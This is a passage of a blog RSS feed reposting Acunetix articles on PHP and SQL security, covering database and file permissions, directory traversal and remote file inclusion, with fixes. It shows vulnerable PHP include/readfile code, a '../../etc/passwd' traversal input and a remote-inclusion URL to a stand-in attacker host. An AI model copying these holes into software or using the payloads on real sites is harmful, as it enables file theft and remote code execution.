<p>then the same kind of attack as before can be mounted. In this case, simply   using addslashes() isn&#8217;t enough: you will prevent the command execution, but the   database will still consider this to be an error as the words are not valid in   that context. The only way to ensure against this kind of attack is to perform   consistent input validation. Make sure that a value you think should be an   integer really is. A regular expression that matches any non-integer characters   should return false on a PHP string containing only an &ldquo;integer&rdquo;. When that   string is treated as an integer by SQL, it will therefore not cause any errors   or unexpected code execution.</p>
<p>
<h3>Database Ownership &amp; Permissions</h3>
<p>There are other   precautions you may be able to take to prevent some of the more serious SQL   injection attacks. One such course of action is to implement access control on   the database. Many database packages support the concept of users, and it should   be possible to set an owner, with full permissions to modify anything within the   database, and other users which may only connect and issue SELECT or INSERT   queries, thus preserving any data already entered against DELETE or DROP   commands. The specifics of achieving such protection will depend on the database   system you&#8217;re using, and consulting the documentation or user manual should   reveal how to implement access control.</p>
<p>The user designated as the database owner should never be used to connect to   the database from a PHP script; owner privileges should be used on consoles or   web admin interfaces such as phpmysqladmin. If a script requires the DELETE or   UPDATE commands, it should ideally use a separate user account to the standard   account, so that the standard account can only add data using INSERT, and   retrieve data using SELECT. This separation of permissions prevents attacks by   limiting the effectiveness of any one SQL injection avenue. If, by poor or   forgetful programming, a user can inject SQL into one script, they will gain   only SELECT / INSERT permissions, or only UPDATE / DELETE permissions, and never   sufficient permissions to drop entire tables or modify the table structure using   the ALTER command.</p>
<p>
<h3>File Permissions</h3>
<p>Data in a database system must be stored   somehow on disk. The database system itself is responsible for exactly how the   data is stored, but usually there will be a data/ directory under which the   database keeps its files. On a shared hosting system, or a system which allows   users some access to the filesystem, it is essential to reduce the permissions   on this file to a bare minimum; only the system user under which the database   process itself runs should have read or write access to the data files. The web   server does not need access as it will communicate with the database system for   its data, instead of accessing the files directly.</p>
<p>
<h3>Making Database Connections</h3>
<p>PHP usually connects to the   database management system through a TCP socket or a local domain socket (on   UNIX/Linux). Where possible, you should prevent connections to this socket from   IP addresses or processes other than the web server, and any other process which   needs access to the data (for example, if you have internal order processing   software which does not run through the web server). If the web server and the   database server are on the same computer, and no other services are running   which may be exploited to provide a database connection, it should be sufficient   to allow only the local host (given by the hostname localhost or the IP address   127.0.0.1) access to the TCP port on which the database manager is listening. If   the web server and database server are on different machines, the IP of the web   server should be specified explicitly. In short, limit the access to the   database as much as possible without breaking anything that needs access to it.   This should help to ensure that the only access channel is via your PHP scripts,   and those have been written securely enough to check for unexpected or   unauthorised data and reject it before it reaches the database.</p>
<p>
<h3>Database Passwords In Scripts</h3>
<p>Finally, a word on database   passwords. Each database user should be assigned a password, and your scripts   will need this password in order to initiate a connection to the database.   Ideally, scripts containing configuration data such as the database username and   password should be stored outside of the web server&#8217;s document root. This   prevents a casual attacker retrieving the plain text of the configuration file   and obtaining the database password.</p>
<p>Other methods to consider are to use a .php extension for the file, instead   of the commonly used .inc extension, for included files. The .php extension   ensures that the file is passed through PHP before output is sent to the user&#8217;s   browser, and so it is possible to prevent display of data within the file simply   by not echoing it!</p>
<p>.htaccess files provide a third method of protecting against password   grabbing. If you deny web access to files whose names begin with   .databaseconfig, for instance, a user cannot easily obtain the file through the   web server directly.</p>
<p>Of course, a user may still be able to exploit file access security   vulnerabilities in scripts to obtain, or even to change, the contents of the   file.</p>
<p>
<h3>How to check for PHP vulnerabilities</h3>
<p>The best way to   check whether your web site &amp; applications are vulnerable to PHP security   attacks is by using a Web Vulnerability Scanner. A Web Vulnerability Scanner   crawls your entire website and automatically checks for vulnerabilities to PHP   attacks. It will indicate which scripts are vulnerable so that you can fix the   vulnerability easily. Besides PHP security vulnerabilities, a web application   scanner will also check for SQL injection, Cross site scripting &amp; other web   vulnerabilities.</p>
<p>The <A target="_blank" href="http://www.acunetix.com/vulnerability-scanner/">Acunetix Web   Vulnerability Scanner</A> scans for <A target="_blank" href="sql-injection.htm">SQL   injection</A>, <A target="_blank" href="../cross-site-scripting/Copy-scanner.htm">Cross site   scripting</A>, <A target="_blank" href="google-hacking.htm">Google hacking</A> and many more   vulnerabilities. For <A target="_blank" href="http://www.acunetix.com/vulnerability-scanner/">more information</A> &amp;   a trial download <A target="_blank" href="../vulnerability-scanner/download.htm">click   here</A>.</p>
<p>
<h3>Check if your website is vulnerable to attack with Acunetix Web   Vulnerability Scanner</h3>
</p>
<p>Acunetix Web Vulnerability Scanner ensures website security by automatically   checking for <A target="_blank" href="../vulnerability-scanner/sql-injection.htm">SQL   injection</A>, <A target="_blank" href="../cross-site-scripting/Copy-scanner.htm">Cross site   scripting</A> and other vulnerabilities. It checks password strength on   authentication pages and automatically audits shopping carts, forms, dynamic   content and other web applications. As the scan is being completed, the software   produces detailed reports that pinpoint where vulnerabilities exist. Take a <A target="_blank" href="../vulnerability-scanner/features.htm">product tour</A> or <A target="_blank" href="../vulnerability-scanner/download.htm">download</A> the evaluation version   today!</p>
<p>
<h3>Scanning for XSS vulnerabilities with Acunetix WVS Free   Edition!</h3>
<p>To check whether your website has cross site scripting   vulnerabilities, download the Free Edition from <A target="_blank" href="http://www.acunetix.com/cross-site-scripting/scanner.htm">http://www.acunetix.com/cross-site-scripting/scanner.htm</A>.   This version will scan any website / web application for <A target="_blank" href="xss.htm">XSS</A> vulnerabilities and it will also reveal all the essential   information related to it, such as the vulnerability location and remediation   techniques. Scanning for XSS is normally a quick exercise (depending on the size   of the web-site).</p>
<p>
<h3>Later In The Series</h3>
<p>The next article in this series looks   at PHP and file access in detail.</p>
<p>Source: <A target="_blank" href="http://www.acunetix.com/websitesecurity/">Website security</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/samashok.wordpress.com/90/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/samashok.wordpress.com/90/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/90/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/90/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/90/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=90&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2008/06/05/php-sql-security-part-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>PHP / SQL Security &#8211; Part 3</title>
		<link>http://samashok.wordpress.com/2008/06/05/php-sql-security-part-3/</link>
		<comments>http://samashok.wordpress.com/2008/06/05/php-sql-security-part-3/#comments</comments>
		<pubDate>Thu, 05 Jun 2008 07:43:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[PHP / SQL Security]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2008/06/05/php-sql-security-part-3/</guid>
		<description><![CDATA[Last Time&#8230; In the first article, I covered input validation and securing user input. In the previous article, I looked at securing database input, and securing databases themselves. This led on to the issue of controlling file access within PHP, which is the topic of this part of the series. Directory Traversal Attacks In a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=89&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>
<h6>Last Time&#8230;</h6>
<p>In the first article, I covered input   validation and securing user input. In the previous article, I looked at   securing database input, and securing databases themselves. This led on to the   issue of controlling file access within PHP, which is the topic of this part of   the series.</p>
<p>
<h3>Directory Traversal Attacks</h3>
<p>In a directory traversal   attack, the attacker will specify a filename containing characters which are   interpreted specially by the filesystem. Usually, . refers to the same   directory, and .. refers to its parent directory. For example, if your script   asks for a username, then opens a file specific to that username (code below)   then it can be exploited by passing a username which causes it to refer to a   different file.</p>
<p>$username = $_GET['user'];<BR>  $filename =   &ldquo;/home/users/$username&rdquo;;<BR>  readfile($filename);</p>
<p>If an attacker passes the query string</p>
<p>?user=../../etc/passwd</p>
<p>then PHP will read /etc/passwd and output that to the user. Since most   operating systems restrict access to system files, and with the advent of shadow   password files, this specific attack is less useful than it previously was, but   similarly damaging attacks can be made by obtaining .php files which may contain   database passwords, or other configuration data, or by obtaining the database   files themselves. Anything which the user executing PHP can access (usually,   since PHP is run from within a web server, this is the user the web server runs   as), PHP itself can access and output to a remote client.</p>
<p>Once again, PHP provides functions which step in and offer some protection   against this kind of attack, along with a configuration file directive to limit   the file paths a PHP script may access.</p>
<p>realpath() and basename() are the two functions PHP provides to help avoid   directory traversal attacks. realpath() translates any . or .. in a path,   resulting in the correct absolute path for a file. For example, the $filename   from above, passed into realpath(), would return</p>
<p>/etc/passwd</p>
<p>basename() strips the directory part of a name, leaving behind just the   filename itself. Using these two functions, it is possible to rewrite the script   above in a much more secure manner.</p>
<p>$username = basename(realpath($_GET['user']));<BR>  $filename =   &ldquo;/home/users/$username&rdquo;;<BR>  readfile($filename);</p>
<p>This variant is immune to directory traversal attacks, but it does not   prevent a user requesting a file they weren&#8217;t expected to request, but which was   in the same directory as a file they are allowed to request. This can only be   prevented by changing filesystem permissions on files, by scanning the filename   for prohibited filenames, or by moving files you do not want people to be able   to request the contents of outside of the directory containing the files you do   want people to be able to access.</p>
<p>The configuration file variable open_basedir can be used to specify the base   directory, or a list of base directories, from which PHP can open files. A   script is forbidden to open a file from a directory which is not in the list, or   a subdirectory of one in the list.</p>
<p>Note that PHP included files are subject to this restriction, so the standard   PHP include directory should be listed under open_basedir as well as any   directories containing files you wish to provide access to through PHP.   open_basedir can be specified in php.ini, globally in httpd.conf, or as a   per-virtual host setting in httpd.conf. The php.ini syntax is</p>
<p>open_basedir = &ldquo;/path:/path2:/path3&rdquo;</p>
<p>The httpd.conf syntax makes use of the php_admin_value option,</p>
<p>php_admin_value open_basedir &ldquo;/path:/path2:/path3&rdquo;</p>
<p>open_basedir cannot be overridden in .htaccess files.</p>
<p>
<h3>Remote Inclusion</h3>
<p>PHP can be configured with the   allow_url_fopen directive, which allows it to treat a URL as a local file, and   allows URLs to be passed to any PHP function which expects a filename, including   readfile() and fopen(). This provides attackers with a mechanism by which they   can cause remote code to be executed on the server.</p>
<p>Consider the following case. Here, the include() function is used to include   a PHP page specific to an individual user. This may be to import their   preferences as a series of variables, or to import a new set of functionality   for a different user type.</p>
<p>include($_GET['username'] . &#8216;.php&#8217;);</p>
<p>This assumes that the value of username in the GET request corresponds to the   name of a local file, ending with .php. When a user provides a name such as bob,   this looks for bob.php in the PHP include directories (current directory, and   those specified in php.ini). Consider, however, what happens if the user   enters</p>
<p><A target="_blank" href="http://www.attackers-r-us.com/nastycode">http://www.attackers-r-us.com/nastycode</A></p>
<p>This translates to http://www.attackers-r-us.com/nastycode.php and with   allow_url_fopen enabled, this remote file will be included into the script and   executed. Note that the remote server would have to serve php files as the raw   script, instead of processing them with a PHP module first, in order for this   attack to be effective, or a script would have to output PHP code (   readfile(realnastycode.php) for instance).</p>
<p>Mechanisms such as the above allow attackers to execute any code they desire   on vulnerable web systems. This is limited only by the limitations placed on PHP   on that system, and the limitations of the user under which PHP is running   (usually the same user that the entire web server is running under).</p>
<p>One simple way to prevent this style of attack is to disable allow_url_fopen.   This can be set in php.ini. If allow_url_fopen is required for some parts of   your site, another technique is to prefix the file path with the absolute path   to the starting directory. This reduces the portability of your scripts, since   that path must be set depending on where the script was installed, but it   results in increased security, since no path starting with a / (or X:\, or   whatever it is on your operating system) can be interpreted as a URL.</p>
<p>$username =   basename(realpath($_GET['username']));<BR>  include(&#8216;/home/www/somesite/userpages/&#8217;   . $username . &#8216;.php&#8217;);</p>
<p>The code above highlights not only prefixing with an absolute path, but also   protecting against directory traversal using basename and realpath.</p>
<p>Note that the third solution to the remote inclusion problem is to never use   user-supplied filenames. This alleviates a large number of file-related security   issues, and is recommended wherever possible. Databases and support for PHP   concepts such as classes should reduce user-specified file operations to a   minimum.</p>
<p>
<h3>File Permissions</h3>
<p>Files created with PHP have default   permissions determined by the umask, short for unmask. This can be found by   calling the umask() function with no arguments.</p>
<p>The file permissions set are determined by a bitwise and of the umask against   the octal number 0777 (or the permissions specified to a PHP function which   allows you to do so, such as mkdir(&#8220;temp&#8221;,0777) ). In other words, the   permissions actually set on a file created by PHP would be 0777 &amp;   umask().</p>
<p>A different umask can be set by calling umask() with a numeric argument. Note   that this does not default to octal, so umask(777) is not the same as   umask(0777). It is always advisable to prefix the 0 to specify that your number   is octal.</p>
<p>Given this, it is possible to change the default permissions by adding bits   to the umask. A umask is &#8220;subtracted&#8221; from the default permissions to give the   actual permissions, so if the default is 0777 and the umask is 0222, the   permissions the file will be given are 0555. If these numbers don&#8217;t mean   anything to you, see the next section on UNIX File Permissions.</p>
<p>The umask is clearly important for security, as it defines the permissions   applied to a file, and therefore how that file may be accessed. However, the   umask applies server-wide for the duration it is set, so in a multi-threaded   server environment, you would set a default umask with appropriate value, and   leave it at that value. Use chmod() to change the permissions after creation of   files whose permissions must differ from the default.</p>
<p>
<h3>UNIX File Permissions</h3>
<p>UNIX file permissions are split   into three parts, a user part, a group part, and an &#8220;others&#8221; part. The user   permissions apply to the user whose userid is specified as the owner of the   file. The group permissions apply to the group whose groupid is specified as the   group owner of the file, and the other permissions apply to everyone else.</p>
<p>The permissions are set as a sum of octal digits for each part, where read   permission is 4, write permission is 2, and execute permission is 1. To create   UNIX file permissions, add each permission digit you want to apply to each part,   then combine the three to get a single octal number (note, on the command line,   chmod automatically treats numbers as octal, in PHP, you need to specify a   leading zero).</p>
<p>The permissions are also commonly displayed in the form of r (read), w   (write) and x (execute), written three times in a single row. The first three   form the user permissions, second the group, and third others.</p>
<p>Take, for example, a file owned by user andrew and group users. The user   andrew must be able to read, write and execute the file, the users group must be   able to read and execute it, and everyone else must be able to execute only.</p>
<p>This corresponds to -rwxr-x&#8211;x, where each &#8211; is a placeholder for the missing   character of permissions (w, for instance, in the group, and rw in the others).   The &#8211; at the front is due to the fact that there is an extra part which   specifies other, UNIX specific, attributes. The ls directory listing tool uses   this first column to display a d character if the item is a directory.</p>
<p>To obtain this permission set in octal, simply add the digits 4, 2 and 1, in   three separate numbers, then combine them in order. The user permissions are   rwx, which is 4 + 2 + 1 = 7. The group permissions are r-x, which is 4 + 1 = 5,   and the other permissions are &#8211;x, which is 1 = 1. We now have the values 7 for   user, 5 for group, and 1 for others, which combines to the octal number   0751.</p>
<p>The actual permissions applied to a file created depend on the permissions   set, and the umask, which subtracts from the permissions set (actually its a   bitwise and, but it has the effect of subtracting, as long as you treat the   permissions as though they were three distinct octal numbers, and not a single   three digit octal number). A umask of 0266, (which is equivalent to not write,   not read or write, not read or write, for user, group, and others, respectively)   applied to a default permission of 0777, results in 0511, which is -r-x&#8211;x&#8211;x.   The umask is determined in the same way as the permissions, but you start with 7   and subtract the numbers for the permissions you do not want.</p>
<p>
<h3>How to check for PHP vulnerabilities</h3>
<p> <BR>  The best way to   check whether your web site &amp; applications are vulnerable to PHP security   attacks is by using a Web Vulnerability Scanner. A Web Vulnerability Scanner   crawls your entire website and automatically checks for vulnerabilities to PHP   attacks. It will indicate which scripts are vulnerable so that you can fix the   vulnerability easily. Besides PHP security vulnerabilities, a web application   scanner will also check for SQL injection, Cross site scripting &amp; other web   vulnerabilities.</p>
<p>The <A target="_blank" href="http://www.acunetix.com/vulnerability-scanner/">Acunetix Web   Vulnerability Scanner</A> scans for <A target="_blank" href="sql-injection.htm">SQL   injection</A>, <A target="_blank" href="../cross-site-scripting/Copy-scanner.htm">Cross site   scripting</A>, <A target="_blank" href="google-hacking.htm">Google hacking</A> and many more   vulnerabilities. For <A target="_blank" href="http://www.acunetix.com/vulnerability-scanner/">more information</A> &amp;   a trial download <A target="_blank" href="../vulnerability-scanner/download.htm">click   here</A>.</p>
<p>
<h3>Check if your website is vulnerable to attack with Acunetix Web   Vulnerability Scanner</h3>
</p>
<p>Acunetix Web Vulnerability Scanner ensures website security by automatically   checking for <A target="_blank" href="../vulnerability-scanner/sql-injection.htm">SQL   injection</A>, <A target="_blank" href="../cross-site-scripting/Copy-scanner.htm">Cross site   scripting</A> and other vulnerabilities. It checks password strength on   authentication pages and automatically audits shopping carts, forms, dynamic   content and other web applications. As the scan is being completed, the software   produces detailed reports that pinpoint where vulnerabilities exist. Take a <A target="_blank" href="../vulnerability-scanner/features.htm">product tour</A> or <A target="_blank" href="../vulnerability-scanner/download.htm">download</A> the evaluation version   today!</p>
<p>
<h3>Scanning for XSS vulnerabilities with Acunetix WVS Free   Edition!</h3>
<p>To check whether your website has cross site scripting   vulnerabilities, download the Free Edition from <A target="_blank" href="http://www.acunetix.com/cross-site-scripting/scanner.htm">http://www.acunetix.com/cross-site-scripting/scanner.htm</A>.   This version will scan any website / web application for <A target="_blank" href="xss.htm">XSS</A> vulnerabilities and it will also reveal all the essential   information related to it, such as the vulnerability location and remediation   techniques. Scanning for XSS is normally a quick exercise (depending on the size   of the web-site).</p>
<p>
<h3>File Uploads</h3>
<p>So far, we have discussed file operations as   they apply to existing files on the server, and files created by a PHP script   directly. We have not considered the security issues surrounding user-provided   files, i.e. direct file uploads. PHP has a number of built-in functions to deal   with file uploads in a safe manner, and these will be discussed in the next   article of the series.</p>
<p><strong>Source: <A target="_blank" href="http://www.acunetix.com/websitesecurity/">Website security</a></strong></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/samashok.wordpress.com/89/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/samashok.wordpress.com/89/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/89/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=89&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2008/06/05/php-sql-security-part-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
	</channel>
</rss>
